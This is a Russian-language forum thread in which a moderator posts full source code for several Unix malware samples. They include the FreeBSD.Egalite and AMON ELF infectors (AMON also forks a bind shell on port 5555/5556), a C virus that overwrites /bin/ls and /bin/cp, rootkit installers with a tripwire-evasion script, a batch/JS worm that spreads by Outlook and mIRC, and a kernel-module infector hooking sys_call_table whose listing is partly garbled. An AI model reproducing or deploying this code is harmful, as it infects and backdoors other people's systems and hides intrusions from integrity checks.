FreeBSD вирусы
#1 permalink
Moderator
MYSTiQUE вне форума
Регистрация: 01.11.2008
Сообщений: 455
FreeBSD вирусы
FreeBSD.Egalite
Код:
; FreeBSD.Egalite herm1t@vx.netlux.org 19-10-2005
BITS 32
CPU 386
global _start
%macro _mov 2
%if %2 == 0
xor %1, %1
%else
%if %2 < 128
push byte %2
pop %1
%else
mov %1, %2
%endif
%endif
%endmacro
%define O(x) (x - virus_start)
%macro syscall 3
_mov eax, %1
push eax
int 0x80
jnb %%L1
add esp, (%2 * 4)
jmp %3
%%L1: add esp, (%2 * 4)
%endm
%define PAGE_SIZE 4096
%define SYS_write 4
%define SYS_open 5
%define SYS_close 6
%define SYS_lseek 19
%define SYS_mmap 197
%define SYS_munmap 73
%define SYS_getdents 272
%define D_RECLEN 4
%define D_NAME 8
%define PT_LOAD 1
%define PT_INTERP 3
%define PT_PHDR 6
%define e_entry 24
%define e_phoff 28
%define e_shoff 32
%define e_phnum 44
%define e_shnum 48
%define p_type 0
%define p_offset 4
%define p_vaddr 8
%define p_paddr 12
%define p_filesz 16
%define p_memsz 20
%define p_flags 24
%define p_align 28
%define sh_offset 16
_start: jmp virus_start
fake_host: push 0
mov eax, 1
push eax
int 0x80
virus_start: pusha
xor edx, edx
mov dh, 4
sub esp, edx
mov ecx, esp
mov word [ecx], 0x2e
push 0
push ecx
syscall SYS_open, 3, .a1
xchg eax, ebx
push 1024
push ecx
push ebx
call find_first
or eax, eax
jz .a1
.a0: push eax
call infect
or eax, eax
jnz .a1
push 1024
push ecx
push ebx
call find_next
or eax, eax
jnz .a0
.a1: add esp, edx
popa
push strict dword fake_host
old_entry equ $ - 4
ret
infect: pusha
mov ebx, [esp + 36]
xor eax, eax
mov dword [esp + 28], eax
cld
push 2
push ebx
syscall SYS_open, 3, .return
xchg eax, ebx
push 2
push 0
push ebx
syscall SYS_lseek, 4, .close
xchg eax, edx
push 0
push 0
push 0
push ebx
push 1
push 3
push edx
push 0
syscall SYS_mmap, 9, .close
xchg eax, esi
mov eax, dword [esi]
add eax, 0xb9b3ba81
jnz .unmap
cmp dword [esi + 16], 0x00030002
jne .unmap
mov eax, [esi + 20]
dec eax
jnz .unmap
cmp byte [esi + 7], 9
jne .unmap
cmp byte [esi + 8], 1
je .unmap
mov edi, esi
add edi, [esi + e_phoff]
movzx ecx, word [esi + e_phnum]
mov ebp, ecx
shl ebp, 5
add ebp, [esi + e_phoff]
.f0: cmp dword [edi + p_type], PT_INTERP
jne .f1
mov ebp, [edi + p_offset]
add ebp, [edi + p_filesz]
jmp .f2
.f1: add edi, 32
loop .f0
.f2: mov ecx, PAGE_SIZE
sub ecx, ebp
cmp ecx, VIRUS_SIZE
jb .unmap
pusha
push edx
push esi
syscall SYS_munmap, 3, .unmap
push 64
pop ecx
sub esp, ecx
mov edi, esp
xor eax, eax
push ecx
push edi
rep stosb
pop edi
pop ecx
.i0: push 64
push edi
push ebx
mov eax, SYS_write
push eax
int 0x80
add esp, 16
cmp eax, 64
je .i1
add esp, 64
popa
jmp .unmap
.i1: loop .i0
add esp, 64
add edx, PAGE_SIZE
push 0
push 0
push 0
push ebx
push 1
push 3
push edx
push 0
mov eax, SYS_mmap
push eax
int 0x80
jnc .i2
add esp, 36
popa
jmp .close
.i2: add esp, 36
xchg eax, esi
push esi
lea edi, [esi + edx]
lea esi, [edi - PAGE_SIZE]
lea ecx, [edx - PAGE_SIZE]
std
rep movsb
pop esi
mov [esp + 4], esi
mov [esp + 20], edx
cld
lea edi, [esi + ebp]
call .a0
.a0: pop esi
lea esi, [esi - .a0 + virus_start]
mov ecx, VIRUS_SIZE
rep movsb
mov ecx, PAGE_SIZE - VIRUS_SIZE
xor eax, eax
rep stosb
popa
mov edi, esi
add edi, [esi + e_phoff]
movzx ecx, word [esi + e_phnum]
.h0: mov eax, PAGE_SIZE
cmp dword [edi + p_type], PT_LOAD
jne .h1
cmp dword [edi + p_offset], 0
jne .h1
sub [edi + p_vaddr], eax
sub [edi + p_paddr], eax
add [edi + p_filesz], eax
add [edi + p_memsz], eax
push eax
mov eax, [esi + e_entry]
mov [esi + ebp + O(old_entry)], eax
mov eax, [edi + p_vaddr]
add eax, ebp
mov [esi + e_entry], eax
mov byte [esi + 8], 1
pop eax
jmp .h4
.h1: cmp dword [edi + p_type], PT_PHDR
je .h2
cmp dword [edi + p_type], PT_INTERP
jne .h3
.h2: sub [edi + p_vaddr], eax
sub [edi + p_paddr], eax
jmp .h4
.h3: add [edi + p_offset], eax
.h4: add edi, 32
loop .h0
mov eax, PAGE_SIZE
add [esi + e_shoff], eax
mov edi, esi
add edi, [esi + e_shoff]
movzx ecx, word [esi + e_shnum]
.g0: add [edi + sh_offset], eax
add edi, 40
loop .g0
inc dword [esp + 28]
.unmap: push edx
push esi
mov eax, SYS_munmap
push eax
int 0x80
add esp, 12
.close: push ebx
mov eax, SYS_close
push eax
int 0x80
add esp, 8
.return: popa
retn 4
find_first: pusha
xor eax, eax
mov edi, [esp + 40]
mov [edi], eax
jmp find_next.s0
find_next: pusha
mov edi, [esp + 40]
.s0: mov ebx, [esp + 36]
mov ecx, [esp + 44]
mov edx, [edi]
or edx, edx
jnz .s2
push ecx
push edi
push ebx
syscall SYS_getdents, 4, .s4
or eax, eax
jz .s4
xor ebp, ebp
.s1: add bp, word [edi + ebp + D_RECLEN]
inc edx
cmp ebp, eax
jb .s1
jmp .s3
.s2: push edi
movzx eax, word [edi + D_RECLEN]
lea esi, [edi + eax]
sub ecx, eax
cld
rep movsb
pop edi
.s3: dec edx
lea eax, [edi + D_NAME]
jmp .s5
.s4: xor eax, eax
.s5: mov [esp + 28], eax
mov [edi], edx
popa
retn 12
VIRUS_SIZE equ O($)
__________________
Quod me nutrit me destruit
*NIX (Unix, Linux, *BSD)
#2 permalink
Moderator
MYSTiQUE вне форума
Регистрация: 01.11.2008
Сообщений: 455
*NIX (Unix, Linux, *BSD)
// ---------------------------
// Linux.R16 by Radix16[MIONS]
// ---------------------------
//
//!!!!!!!!!!!!!!!!!!!!!!!!!
//!rewrite all filez virus!
//!!!!!!!!!!!!!!!!!!!!!!!!!
//
// This is my mini first virus for Linux
// I love Linux and spice ,sux all win product
//
// Text print in text rezim
//
// ------------------------------
// - Linux.R16 by Radix16[MIONS]-
// - I'am virus for Linux
-
// - Made in Czech republic -
// ------------------------------
//
// ------------
// Contact meee :
// ------------
// Radix16.cjb.net
//
Radix16@Atlas.cz
//
// -----------
// How compile :
// -----------
// gcc radix.cpp
//
// -------------
// Start my code :
// -------------
Код:
#include <stdio.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#define VirusSize 59100
int main(int argc,char *argv[]) { // Main program
ssize_t ret;
int handle, bytes , retn;
char *buff[256];
char *ch,virus[VirusSize];
struct dirent *dirp;
DIR *dp;
char pathname[1024];
handle = open(argv[0],O_RDONLY);
read(handle,virus,VirusSize);
handle = creat ("/usr/sexloader",7);
if (handle == -1) {
printf("uf!");
}
write(handle,virus,VirusSize);
handle = creat ("/bin/cp",7);
if (handle == -1) {
printf("ou!");
}
write(handle,virus,VirusSize);
handle = creat ("/bin/ls",7);
if (handle == -1) {
printf("Shit!");
}
write(handle,virus,VirusSize);
handle = open("/usr/tmp001x.not",O_RDWR);
if (handle == -1) {
handle = creat ("/usr/tmp001x.not",0);
if (handle == -1) {
ret = write(handle, "Contact me:"
"\n\n"
"Radix16.cjb.net"
"\n"
"Radix16@atlas.cz",11+2+15+1+16);
if (ret == -1) {
exit(0);
}
printf ("\n\n");
printf ("\t\t""Linux.R16 by Radix16[MIONS]" " \n");// (c)oded
printf ("\t\t""I'am free virus for Linux :)" "\n");// Print text (textrezim)
printf ("\t\t""Made in Czech republic" "\n");// My World
printf ("\n\n");
exit(retn);
}
}
if ((dp = opendir(".")) == NULL)
{
printf("hech!");
exit(1);
}
readdir(dp); readdir(dp);
while (1) {
if ((dirp = readdir(dp)) == NULL) {
closedir(dp);
return(0);
}
if (access(dirp->d_name,X_OK | W_OK) < 0) {
exit(-1);
}
handle = creat (dirp->d_name,7);
if (handle == -1) {
printf("zzz..");
}
write(handle,virus,VirusSize);
}
close(handle);
exit(retn);
// End program(virus)
}
__________________
Quod me nutrit me destruit
Последний раз редактировалось MYSTiQUE; 11.07.2011 в 15:32 ..
FreeBsd rootkit
#3 permalink
Moderator
MYSTiQUE вне форума
Регистрация: 01.11.2008
Сообщений: 455
FreeBsd rootkit
Код:
#!/bin/sh
# Simple script to avoid detection by tripwire. Modify to suit your needs.
echo -n "Trying to guess the location of tripwire. . ."
TRIPWIRE=`which tripwire`
if [ ! -x $TRIPWIRE ]; then
echo "Failed!"
echo -n "Please enter a full path to tripwire: "
while read TRIPWIRE; do
if [ -x $TRIPWIRE ]; then
echo "Ok."
break
else
echo -n "That doesn't exist! Try again: "
fi
done
else
echo "Ok: $TRIPWIRE"
fi
echo -n "Trying to guess the location of the tripwire database. . ."
DBPATH="/usr/adm/tcheck/databases/tw.db"
if [ ! -f $DBPATH ]; then
echo "Failed!"
echo -n "Please enter the name of the database file: "
while read DBPATH; do
if [ -f $DBPATH ]; then
echo "Ok."
break
else
echo -n "That doesn't exist! Try again: "
fi
done
else
echo "Ok: $DBPATH"
fi
DONE=false
while [ $DONE = "false" ]; do
DONE=true
echo -n "Is the database file read-only?[y(n)] "
read ANSWER
case $ANSWER in
[yY] )
make tripwire-inst
install.sh $TRIPWIRE
exit 0 ;;
[nN] )
break ;;
* )
echo "Yes or No"\!
DONE=false ;;
esac
done
DBFILE=./databases/`basename $DBPATH`
for BIN; do
echo -n "Updating $BIN. . ."
$TRIPWIRE -update $BIN
mv $DBFILE $DBPATH
echo "done."
done
echo "All done here chief!"
Код:
#!/bin/sh
# Installation script for the FreeBSD rootkit. Make as many changes as you like.
# Uncomment the below line if you want to backup the files.
#BAKDIR=bak
for BIN; do
PROG=`basename $BIN`
echo -n "Installing $PROG. . ."
RKBIN=$PROG/$PROG
if [ -x $BIN ]; then
addlen $RKBIN $BIN
fix $BIN $RKBIN $BAKDIR
fi
echo "done."
done
echo "The installation is complete."
__________________
Quod me nutrit me destruit
Radex
#4 permalink
Moderator
MYSTiQUE вне форума
Регистрация: 01.11.2008
Сообщений: 455
Radex
Код:
# /bin/sh
echo "-=LINUX START=-"
cp LINUX_SH_DOS_BAT_WIN_JS.bat /tmp/LINUX_SH_DOS_BAT_WIN_JS.bat
cp LINUX_SH_DOS_BAT_WIN_JS.bat /
cat LINUX_SH_DOS_BAT_WIN_JS.bat >> *.sh
:DOS_WIN
@ctty nul
cls
echo -=DOS/WIN START=-
rem ONLY SAMPLE (TEST)
rem WoRlD iS mY
echo [windows] >>$buffer
echo run=C:\WINDOWS\LINUX_SH_DOS_BAT_WIN_JS.js >>$buffer
type c:\windows\win.ini >>$buffer
type $buffer >c:\windows\win.ini
del $buffer
echo // LINUX_SH_DOS_BAT_WIN_JS > LINUX_SH_DOS_BAT_WIN_JS.js
echo var Topic_Text = "Radix16/SMF" >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var Title_Text = "SH-BAT-JS" >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var virusname = "LINUX_SH_DOS_BAT_WIN_JS.js" >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var WSHShell = WScript.CreateObject("WScript.Shell") >> LINUX_SH_DOS_BAT_WIN_JS.js
echo msgb = WSHShell.Popup(Title_Text,0,Topic_Text,0); >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var fso = WScript.CreateObject("Scripting.FileSystemObject") >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var s1dir = fso.GetSpecialFolder(0) >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var wormname = fso.GetFile(WScript.ScriptFullName) >> LINUX_SH_DOS_BAT_WIN_JS.js
echo wormname.copy (s1dir + "\\" + virusname) >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var Outlook = WScript.CreateObject("Outlook.Application")>> LINUX_SH_DOS_BAT_WIN_JS.js
echo var msgmapi = Outlook.CreateItem(0)>> LINUX_SH_DOS_BAT_WIN_JS.js
echo msgmapi.To = "Radix16@atlas.cz" >> LINUX_SH_DOS_BAT_WIN_JS.js
echo msgmapi.Subject = "SHBATJS">> LINUX_SH_DOS_BAT_WIN_JS.js
echo msgmapi.Body = "crazzy bat :) testing MS OTLOOK in the (WORLD) ">> LINUX_SH_DOS_BAT_WIN_JS.js
echo msgmapi.Attachments.Add (s1dir + "\\LINUX_SH_DOS_BAT_WIN_JS.bat") >> LINUX_SH_DOS_BAT_WIN_JS.js
echo msgmapi.DeleteAfterSubmit = 1 >> LINUX_SH_DOS_BAT_WIN_JS.js
echo msgmapi.Send >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var IRCpath = ("C:\\mirc\\") >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var True = 1 >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var IRCbxs = fso.CreateTextFile(IRCpath + "script.ini", True) >> LINUX_SH_DOS_BAT_WIN_JS.js
echo IRCbxs.WriteLine ("[script]") >> LINUX_SH_DOS_BAT_WIN_JS.js
echo IRCbxs.WriteLine ("n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }") >> LINUX_SH_DOS_BAT_WIN_JS.js
echo IRCbxs.WriteLine ("n1=/dcc send $nick " + s1dir + "\\LINUX_SH_DOS_BAT_WIN_JS.bat") >> LINUX_SH_DOS_BAT_WIN_JS.js
echo IRCbxs.WriteLine ("}") >> LINUX_SH_DOS_BAT_WIN_JS.js
type %0 C:\Windows\winstart.bat
copy %0 C:\Windows\LINUX_SH_DOS_BAT_WIN_JS.bat
copy %0 C:\Win95\LINUX_SH_DOS_BAT_WIN_JS.bat
copy %0 C:\Win98\LINUX_SH_DOS_BAT_WIN_JS.bat
copy %0 C:\WinME\LINUX_SH_DOS_BAT_WIN_JS.bat
wscript.exe LINUX_SH_DOS_BAT_WIN_JS.js
del LINUX_SH_DOS_BAT_WIN_JS.js
cls
__________________
Quod me nutrit me destruit
AMON : parasitic ELF virus
#5 permalink
Moderator
MYSTiQUE вне форума
Регистрация: 01.11.2008
Сообщений: 455
AMON : parasitic ELF virus
Код:
;------------------------------------------------------------------------------
;
;
;
; AMON : parasitic ELF virus
;
;
;
;
; Description :
; -------------
;
; - Infect all ELF in the current directory.
; - Full compatible with all kernel 2.2.x,2.4.x and probably with all 2.6.x.
; - Full compatible with all options of kernel security patch (PaX/grsec ...).
; - Use basic EPO technic.
; - Use basic anti debug trick.
; - Bind a shell on port 5556 if UID = 0 else bind a shell on port 5555.
; - Only 960 bytes with complete strip.
; - Restore date and time of last modification.
;anonymous@neptune ~/code/amon $ cat Makefile
;all:
; @echo "-+ amon by rikenar and emp +-"
; nasm -f elf amon.asm
; cc amon.o -o amon -nostdlib
; rm -f amon.o
;
;strip:
; strip amon
; sstrip amon
;
;
;anonymous@neptune ~/code/amon $ make
;-+ amon by rikenar and emp +-
;nasm -f elf amon.asm
;cc amon.o -o amon -nostdlib
;rm -f amon.o
;
;
;anonymous@neptune ~/code/amon $ make strip
;strip amon
;sstrip amon
;
;
;anonymous@neptune ~/code/amon $ ls -l amon
;-rwx------ 1 anonymous anonymous 960 nov 7 01:48 amon
;
;
;
;
;
;greetz : people on #ioc and all our friends
;
;------------------------------------------------------------------------------
%define sys_fork 2
%define sys_read 3
%define sys_open 5
%define sys_close 6
%define sys_exec 11
%define sys_getpid 20
%define sys_getuid 24
%define sys_ptrace 26
%define sys_kill 37
%define sys_dup2 63
%define sys_mmap 90
%define sys_munmap 91
%define sys_ftruncate 93
%define sys_socket 102
%define sys_fstat 108
%define sys_getdents 141
%define PT_LOAD 01
%define O_RDWR 2
%define LISTEN 4
%define SIGKILL 9
%define ELFMAG 0x464C457F
global _start
section .evil
_start:
;ptrace(PTRACE_TRACEME, 0, 0x1, 0)
;
;
;anti debug trick
xor eax, eax
cdq
inc edx
xor ecx, ecx
xor ebx, ebx ;PTRACE_TRACEME
xor esi, esi
mov al, sys_ptrace
int 0x80
test eax, eax ;
jne NEAR byebye ;if code is traced then exit
call bomb
;----------------------------------------------------------------------------
;
; find file to infect and call the infection function
push '.'
mov ebx, esp
call opendir ;open current directory
call getdents ;list file of this directory
add esp, 0x08 ;next name
again:
mov ebx, esp
add ebx, 2
mov esi, ebx
call openfile ; open file
cmp ah, 0xFF ; if error on open
je nextf ; find another file
call verif ; test file type and infection
test eax, eax ;
je nextf ; find another file
mov eax, sys_fstat
sub esp, 0x40
mov ecx, esp
int 0x80 ; file size
add esp, 0x40 ;
push DWORD [ecx+0x28]
push DWORD [ecx+0x20]
push esi ; save name of file for utime.
mov ecx, [ecx+0x14] ; ecx = st_size
mov esi, ecx
call infection ; WAR IS ON !
xchg ebx, esi ; fd in esi.
mov eax, 0x1e
pop ebx
mov ecx, esp
int 0x80
add esp, 8
nextf:
xchg esi, ebx ; fd in ebx.
mov eax, sys_close
int 0x80
call nextfile ; find next file
test eax, eax
jne again
exit:
byebye:
xor eax, eax
inc eax ; bye bye
xor ebx, ebx
int 0x80
;---------------------------------------------------------------------------
;
; infection functions
infection:
add ecx, 0x2000
and ecx, 0xFFFFF000
mov eax, sys_ftruncate ; size of file multiple of 0x1000
int 0x80 ;
push ebx ; save fd
push ecx ; push size of file for unmap
call Mapping ; map file, adress of map in eax.
xchg esi, ecx
mov ebx, [eax+0x1c]
add bx, WORD [eax+0x2a] ; phdr INTERP.
mov esi, [eax+ebx+0x04] ; offset of this phdr.
push esi
sub ecx, esi ; size of code to move.
sub esp, ecx
add esi, eax
mov edx, ecx
mov edi, esp
rep movsb ;
mov esi, esp
mov ecx, edx
mov ebx, [eax+0x1c]
add bx, WORD [eax+0x2a]
mov edi, [eax+ebx+4]
add edi, eax
add edi, 0x1000
rep movsb
add esp, edx ;
call PatchSegment ; Patch segments.
pop edi
push eax
mov ecx, edi
call PatchSection ; Patch sections.
pop eax
mov ecx, 0x1000
add [eax+0x20], ecx ; Patch e_shoff.
call delta
delta: pop ebx
sub ebx, delta ; delta offset.
mov esi, _start
add esi, ebx
add ebp, edi ; ebp = adress of code
add edi, eax
mov ecx, fin_code - _start
rep movsb ; write code.
mov ebx, eax
call hijackDtors ; hijack .dtors.
pop ecx ; restaure the size
call Demap
pop ebx ; restaure fd
ret
;----------------------------------------------------------------------------
;
;in : name directory in ebx
;out : fd in eax
opendir:
xor eax, eax
mov al, sys_open
xor ecx, ecx ;O_RDONLY
xor edx, edx ;
int 0x80
ret
;-----------------------------------------------------------------------------
;
;in : pointer to name of file in ebx
;out : fd in ebx
openfile:
xor eax, eax
mov al, sys_open ;open
xor ecx, ecx
mov cl, O_RDWR
xor edx, edx
int 0x80
ret
;-----------------------------------------------------------------------------
;
;in : directory fd in eax
;out : result of getdents on stack
getdents:
pop esi ;save ret addr
sub esp, 0x10000 ;i want some place on stack
xchg eax, ebx
xor eax, eax
mov al, sys_getdents
mov ecx, esp
mov edx, 0x10000
int 0x80
push esi ;
ret
;-----------------------------------------------------------------------------
;
;in : file fd in eax
;out : ebx == NULL if file type false or infection true
verif:
xchg ebx, eax
call read
cmp eax, ELFMAG ;if file is not an ELF
je verifsuite
xor eax, eax ;eax == 0
ret ;
verifsuite:
;check infection
mov eax, sys_fstat
sub esp, 0x40
mov ecx, esp
int 0x80
add esp, 0x40
xor edx, edx
mov eax, [ecx+0x14]
mov ecx, 0x1000
div ecx
test edx, edx ; is file align on 0x1000 ?
jne notinfected ; if no file is not infected, infection FALSE
xor eax, eax ; else infection TRUE
notinfected:
ret
;----------------------------------------------------------------------------
;
;in : pointer of file name in esp
;out : pointer of next file name in esp
nextfile:
pop ebx ; save ret adress
xor eax, eax
mov al, [esp] ; eax = offsset next name
add esp, eax ;
mov al, [esp] ;
push ebx ;
ret
;---------------------------------------------------------------------------
;
;in : fd in ebx
;out : result of read in eax
read:
xor eax, eax
mov al, sys_read
sub esp, 4 ;
mov ecx, esp
mov edx, 4
int 0x80 ;
pop eax ; dword read in eax
ret
;-------------------------------------------------------------------------------
;
;in : fd file in ebx
;out : pointer of map file in eax
Mapping:
xor edx, edx
push edx
push ebx
inc edx
push edx
inc edx
inc edx
push edx
push ecx
xor eax, eax
push eax
mov al, sys_mmap
xchg ebx, edx
mov ebx, esp
int 0x80
xchg ebx, edx
add esp, 0x18
ret
;-------------------------------------------------------------------------------
;
;in : ecx size of mapping
;out : eax == 0 if succes
Demap:
xor eax, eax
mov al, sys_munmap
xor ebx, ebx
int 0x80
ret
;-------------------------------------------------------------------------------
;
;in :
;out :
PatchSegment:
xor ecx, ecx
mov cl, BYTE [eax+0x2c]; ecx = number of segments
mov edx, [eax+0x1c] ; edx pointer to phdr
add edx, eax
rygo:
push ecx ;
mov ecx, 0x06
cmp [edx], ecx ;
jne hi
mov ecx, 0x1000
sub [edx+0x08], ecx
sub [edx+0x0c], ecx ; patch phdr.
jmp ha
hi: xor ecx, ecx
cmp [edx+0x04], ecx ; test if TEXT segment.
jne ho
mov ecx, 0x1000
sub [edx+0x08], ecx
sub [edx+0x0c], ecx
add [edx+0x10], ecx
add [edx+0x14], ecx ; patch phdr.
mov ebp, [edx+08h] ; ebp pointer to viral code
jmp ha
ho: mov ecx, 0x1000
add [edx+04], ecx ; add a memory segment
ha:
pop ecx
dec ecx
test ecx, ecx ; other segments ?
je good ;
add dl, BYTE [eax+0x2a]; if yes we go patch the other
jmp rygo
good:
ret
;----------------------------------------------------------------------------
;
;in :
;out :
PatchSection:
mov edx, [eax+0x20]
add edx, eax
add edx, 0x1000 ; e_shoff
xor ecx, ecx
mov cx, [eax+0x30] ; nbre de section.
dec ecx
xor esi, esi
mov si, [eax+0x2E] ; e_shentsize
patch:
add edx, esi
mov ebx, [edx+0x10] ; sh_offset
add ebx, 0x1000
mov [edx+0x10], ebx
loop patch
ret
;-----------------------------------------------------------------------------
;in : pointer to adress of file mmaping in ebx
;out : eax == 0 if functions fail
hijackDtors:
;find the sh_offset of .shstrtab(e_shentsize*e_shstrndx+e_shoff+adresse map)
xor eax, eax
mov ax, [ebx+0x2E] ; e_shentsize
mov cl, [ebx+0x32] ; e_shstrndx on 8bits!!!(nb_section<255)
mul cl ;
;
add eax, [ebx+0x20] ; + e_shoff == offset shdr .shstrtab
add eax, ebx ; + adress of file maping
mov esi, eax
add esi, 0x10 ; sh_offset of .shstrtab
;looking for .dtors in sh_name of each sections
xor eax, eax
mov eax, [ebx+0x20] ; offset shdr
add eax, ebx ;
xor ecx, ecx
mov cx, [ebx+0x30] ; e_shnum
mov edi, [esi] ; edi == offset .shstrtab
add edi, ebx ;
xor edx, edx
next_shname:
xor edx, edx
mov dx, WORD [ebx+0x2E]
add eax, edx ; next shdr (we don't read the first)
mov esi, [eax]
add esi, edi
mov edx, [esi]
cmp edx, '.dto'
je dtor_finding
loop next_shname
xor eax, eax ; if don't find it
ret ;
;find the last entry in .dtors tab, and write a new entry :)
dtor_finding:
mov ecx, [eax+0x10] ; sh_offset of .dtors
add ecx, ebx ; + map
next_dtor:
add ecx, 4 ; don't check the first entry (must
mov edx, [ecx] ; be 0xFFFFFFFF)
cmp edx, 0
jne next_dtor
mov DWORD [ecx], ebp ; offset of viral code
ret
;----------------------------------------------------------------------------
;bind a shell on port 5556 if uid = 0 else bind a shell on port 5555
bomb:
xor eax, eax
mov al, sys_fork ;fork the logical bomb
int 0x80
test eax, eax
je bindshell ; the son bind the shell
ret ; the father exit
bindshell:
;socket(family, type, proto)
xor eax, eax
cdq
mov al, sys_socket
push edx ; 0=IP
inc edx
push edx ; 1=SOCK_STREAM
inc edx
push edx ; 2=AF_INET
mov ecx, esp
push byte 1
pop ebx ; 1 -> socket
int 0x80
;bind(socket, addr, lenng)
mov edi, eax
cdq
xor ecx, ecx
mov cx, 0xB315
xor eax, eax
mov al, sys_getuid
int 0x80
test eax, eax ;if uid != 0
jne binduser ;goto binduser
inc ch ;
binduser:
push edx
push word cx ; port = 5556 if uid(0) else port = 5555
inc ebx
push bx ; (0002 = AF_INET)
mov ecx, esp ; ecx = offset sockaddr struct
push byte 16 ; len
push ecx ; push offset sockaddr struct
push edi ; handle socket
mov ecx, esp
xor eax, eax
mov al, sys_socket
int 0x80
;If bind fail the process send to himself a SIGKILL
test eax, eax
je listen
xor eax, eax
mov al, sys_getpid
int 0x80
xchg ebx, eax
xor ecx, ecx
mov cl, SIGKILL
xor eax, eax
mov al, sys_kill
int 0x80
;listen(socket, backlog)
listen:
mov al, sys_socket
mov bl, LISTEN
int 0x80
;accept(socket, addr, len)
push eax
push edi
mov ecx, esp
inc ebx ; 5 -> accept
mov al, sys_socket
int 0x80
;dup2()
dup:
mov ecx, ebx
mov ebx, eax
dec ecx
mov al, sys_dup2
int 0x80
inc ecx
loop dup
;execve /bin/sh
mov al, sys_exec
push ecx
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
push ecx
push ebx
mov ecx, esp
int 0x80
fin_code:
__________________
Quod me nutrit me destruit
Kody
#6 permalink
Moderator
MYSTiQUE вне форума
Регистрация: 01.11.2008
Сообщений: 455
Kody
PHP код:
#define __KERNEL__
extern void * sys_call_table [];
/* tested only with kernel 2.0.33, but thiz should run under 2.x.x
static char * default_path [] = {
"." , "/linux/modules" ,
"/lib/modules/2.0.33/fs" ,
"/lib/modules/2.0.33/net" ,
"/lib/modules/2.0.33/scsi" ,
"/lib/modules/2.0.33/block" ,
"/lib/modules/2.0.33/cdrom" ,
"/lib/modules/2.0.33/ipv4" ,
"/lib/modules/2.0.33/misc" ,
"/lib/modules/default/fs" ,
"/lib/modules/default/net" ,
"/lib/modules/default/scsi" ,
"/lib/modules/default/block" ,
"/lib/modules/default/cdrom" ,
"/lib/modules/default/ipv4" ,
"/lib/modules/default/misc" ,
"/lib/modules/fs" ,
"/lib/modules/net" ,
"/lib/modules/scsi" ,
"/lib/modules/block" ,
"/lib/modules/cdrom" ,
"/lib/modules/ipv4" ,
"/lib/modules/misc" ,
0
};
struct symbol_table my_symtab = {
#include <linux/symtab_begin.h>
X ( printk ),
X ( vmalloc ),
X ( vfree ),
X ( kerneld_send ),
X ( current_set ),
X ( sys_call_table ),
X ( register_symtab_from ),
#include <linux/symtab_end.h>
};
char files2infect [ 7 ][ 60 + 2 ];
/* const char kernel_version[] = UTS_RELEASE; */
int (* old_create_module )( char *, int );
int (* old_delete_module )( char *);
int (* open )( char *, int , int );
int (* close )(int);
int (* unlink )( char *);
int our_syscall (int);
int infectfile ( char *);
int is_infected ( char *);
int cp ( struct file *, struct file *);
int writeVir ( char *, char *);
int init_module2 ( struct module *);
char * get_mod_name ( char *);
/* needed to be global */
void * VirCode = NULL ;
/* install new syscall to see if we are already in kmem */
int our_syscall ( int mn )
/* magic number: 40hex :-) */
if ( mn == 0x40 )
0 ;
ENOSYS ;
int new_create_module ( char * name , int size )
int i = 0 , j = 0 , retval = 0 ;
retval = old_create_module ( name , size )) < 0 )
retval ;
/* find next free place */
for ( i = 0 ; files2infect [ i ][ 0 ] && i < 7 ; i ++);
i == 6 )
retval ;
/* get name of mod from user-space */
while (( files2infect [ i ][ j ] = get_fs_byte ( name + j )) != 0 && j < 60 )
j ++;
DPRINTK ( "in new_create_module: got %s as #%d\n" , files2infect [ i ], i );
retval ;
/* we infect modules after sys_delete_module, to be sure
int new_delete_module ( char * modname )
int infected = 0 ;
int retval = 0 , i = 0 ;
char * s = NULL , * name = NULL ;
retval = old_delete_module ( modname );
name = ( char *) vmalloc ( MAXPATH + 60 + 2 )) == NULL )
retval ;
i = 0 ; files2infect [ i ][ 0 ] && i < 7 ; i ++) {
strcat ( files2infect [ i ], ".o" );
s = get_mod_name ( files2infect [ i ])) == NULL ) {
retval ;
name = strcpy ( name , s );
is_infected ( name )) {
DPRINTK ( "try 2 infect %s as #%d\n" , name , i );
infected ++;
infectfile ( name );
memset ( files2infect [ i ], 0 , 60 + 2 );
/* for */
if ( infected >= ENOUGH )
cleanup_module ();
vfree ( name );
retval ;
/* lets take a look at sys_init_module(), that calls
__asm__
( "
);
/* for the one with no -fomit-frame-pointer and no -O2 this should (!) work:
int init_module2 ( struct module * mp )
char * s = NULL , * mod = NULL , * modname = NULL ;
long state = 0 ;
mod = vmalloc ( 60 + 2 );
modname = vmalloc ( MAXPATH + 60 + 2 );
mod || ! modname )
1 ;
strcpy ( mod , mp -> name );
strcat ( mod , ".o" );
MOD_INC_USE_COUNT ;
DPRINTK ( "in init_module2: mod = %s\n" , mod );
/* take also a look at phrack#52 ...*/
mp -> name = "" ;
mp -> ref = 0 ;
mp -> size = 0 ;
/* thiz is our new main ,look for copys in kmem ! */
if ( sys_call_table [ __NR_our_syscall ] == 0 ) {
old_delete_module = sys_call_table [ __NR_delete_module ];
old_create_module = sys_call_table [ __NR_create_module ];
sys_call_table [ __NR_our_syscall ] = ( void *) our_syscall ;
sys_call_table [ __NR_delete_module ] = ( void *) new_delete_module ;
sys_call_table [ __NR_create_module ] = ( void *) new_create_module ;
memset ( files2infect , 0 , ( 60 + 2 )* 7 );
register_symtab (& my_symtab );
register_symtab ( 0 );
open = sys_call_table [ __NR_open ];
close = sys_call_table [ __NR_close ];
unlink = sys_call_table [ __NR_unlink ];
s = get_mod_name ( mod )) == NULL )
1 ;
modname = strcpy ( modname , s );
load_real_mod ( modname , mod );
vfree ( mod );
vfree ( modname );
0 ;
int cleanup_module ()
sys_call_table [ __NR_delete_module ] = old_delete_module ;
sys_call_table [ __NR_create_module ] = old_create_module ;
sys_call_table [ __NR_our_syscall ] = NULL ;
DPRINTK ( "in cleanup_module\n" );
vfree ( VirCode );
0 ;
/* returns 1 if infected;
int is_infected ( char * filename )
char det [ 4 ] = { 0 };
